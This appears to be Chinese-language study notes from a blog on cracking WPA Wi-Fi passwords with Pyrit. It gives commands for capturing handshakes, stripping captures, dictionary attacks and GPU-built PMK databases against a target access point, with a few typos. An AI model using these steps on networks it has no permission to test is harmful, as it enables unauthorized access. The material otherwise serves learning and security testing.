PYRIT 強大的密碼分析工具(可使用GPU分析)-學習筆記

優勢:

可運用GPU的運算加速生成PMK

本身支持抓包獲取四步五首過程,無需用Airodump抓包

也支持傳統的讀取airodump抓包獲取四步握手的方式

只抓取WAP四次握手過程包

pyrit -r wlan0mon -o wpapyrit.cap sripLive# -o 生成握手信息  sripLive 剔除不需要的數據包

pyrit -r wpapyrit.cap analyze進行分析查看是否有握手信息

也可從airodump抓握手包導入並篩選(airodump抓到的包和pyrit格式不一樣,需要在使用之前進行數據轉換)

pyrit -r wpa.cap -o wpapyrit.cap strip

使用密碼字典直接分析(速度比較慢)

pyrit -r wpapyrit.cap -i /usr/share/john/password.lst -b 00:11:22:33:44:55 attack_passthrough#-r 使用的握手包 -b AP的MAC地址

使用數據庫破解:

1.查看默認數據庫狀態:pyrit eval 

2.導入密碼字典(自動剔除不合法密碼): pyrit -i password.lst import passwords

3.指定ESSID:pyrit -e TP_Link722  create essid

4.計算PMK: pyrit batch (默認啓用GPU)

5.分析密碼:pyrit -r wpapyrit.cap -b 00:11:22:33:44:55 attack.db

得出最終的密碼:

 

 

 

 

 

 

 

發佈了38 篇原創文章 · 獲贊 10 · 訪問量 9萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章